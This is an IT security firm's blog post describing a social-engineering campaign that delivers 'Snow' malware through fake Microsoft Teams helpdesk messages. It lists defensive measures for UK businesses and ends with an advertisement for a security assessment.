Microsoft Teams and the "Snow" Malware: What Businesses Should Know
Microsoft Teams is central to daily communication for millions of UK businesses. But now security researchers at Google’s Mandiant team have identified a threat group known as UNC6692, active since late December 2025. The group is using Microsoft Teams as the delivery channel for a custom malware suite called “Snow.”
This is an ongoing campaign that has expanded in scale and become more targeted throughout early 2026. Any organisation using Teams should understand how this campaign works and what it means in practice.
What Is the “Snow” Malware and How Does It Work?
The Snow campaign is a structured social engineering attack built around exploiting employee trust in familiar tools and internal IT processes. The attack typically unfolds in three stages.
Stage 1: Create Chaos
Attackers begin by flooding a target’s inbox with thousands of emails, a tactic known as email bombing. The objective is to overwhelm the user, disrupt normal work, and create urgency.
Stage 2: Step In as the Rescuer
While the target is distracted, a message arrives via Microsoft Teams. It appears to come from an internal IT helpdesk agent offering assistance. The attacker directs the employee to click a link and install what is described as a “Mailbox Repair and Sync Utility.”
Stage 3: Deploy and Take Control
The so-called patch installs a malicious script that deploys the Snow malware toolkit. This operates silently, allowing attackers to steal credentials, move through the network, and establish control without raising obvious alarms.
Why This Matters Now
This campaign is particularly concerning because of its targeting and delivery method.
Between March and April 2026, 77% of observed incidents targeted senior employees. These individuals typically have broader access and higher levels of trust within an organisation. Compromising one account can open multiple pathways deeper into the network. This reflects a deliberate strategy rather than random targeting.
There is also a wider shift in attack patterns. Email is no longer the primary entry point. Collaboration platforms such as Teams and Slack are increasingly being used instead. Many organisations have invested heavily in email security but have not applied the same level of control to these tools.
The Snow campaign exploits that gap by using a trusted platform during a moment of stress to deliver malware designed to avoid detection.
For UK businesses, there is an additional regulatory dimension. A breach of this kind may trigger reporting obligations under UK GDPR Article 33, requiring notification to the ICO within 72 hours. The operational disruption, financial cost, and reputational damage of a domain-level compromise can be severe, and response time is limited.
Practical Steps to Reduce Risk
Although the attack is sophisticated, it is not unstoppable. Several practical measures can significantly reduce exposure.
Review Microsoft Teams external access
Teams often allows external users to message employees by default. Restrict this to a verified list of approved domains wherever possible. If there is no business need for external contact, disable it.
Achieve and maintain Cyber Essentials compliance
Cyber Essentials provides a strong security baseline for UK organisations. Controls around access management, patching, malware protection, and secure configuration directly reduce the likelihood of attacks succeeding. For many businesses, it is one of the most practical starting points for improving resilience.
Implement Conditional Access for Microsoft 365
Conditional Access policies help ensure that only authorised users, devices, and locations can access Microsoft 365 services. Even if credentials are stolen through a campaign like Snow, Conditional Access can prevent attackers from logging in or moving further into the environment.
Provide regular Security Awareness Training (SAT)
Employees are the first line of defence against social engineering attacks. Training should help staff recognise suspicious behaviour such as email bombing, fake IT support requests, and unexpected software installation prompts. Staff should feel confident verifying requests before taking action.
Implement IT helpdesk verification procedures
Employees should follow a clear process to confirm the identity of anyone requesting software installation or link clicks. This applies across Teams, phone, and email. Legitimate IT staff will expect verification.
Restrict PowerShell usage
Snow relies on PowerShell scripts to execute. Tightening execution policies and limiting which scripts can run adds an important layer of defence.
Recognise email bombing as a warning sign
A sudden influx of emails should be treated as suspicious. Employees should be trained to report it rather than seeking quick fixes, especially from unsolicited contacts.
Deploy ITDR and EDR solutions
Identity Threat Detection and Response (ITDR) and Endpoint Detection and Response (EDR) tools provide visibility into suspicious activity across users and devices. These solutions can detect credential misuse, unusual authentication behaviour, lateral movement, and malware activity before attackers gain full control.
Audit privileged access
Since attackers target senior staff, it is critical to limit and monitor privileged accounts. Strong authentication and access controls make lateral movement harder.
The Bigger Picture
The Snow campaign reflects a broader trend in cyber threats. Attackers are focusing less on technical vulnerabilities and more on human behaviour and trusted platforms.
Organisations that treat cyber security as a one-time task are more vulnerable. Those that invest in ongoing awareness, appropriate controls, and continuous monitoring are better prepared to handle evolving threats.
If there is uncertainty about how well current defences would hold up against an attack like this, it is worth addressing that proactively.
Not Sure Where Your Vulnerabilities Are?
A Cyber Security Assessment from Netmatters provides a clear view of current risks and a practical plan to address them. It offers straightforward insight into both technical exposure and operational realities, helping businesses make informed decisions without unnecessary pressure. Book your Cyber Security Assessment today.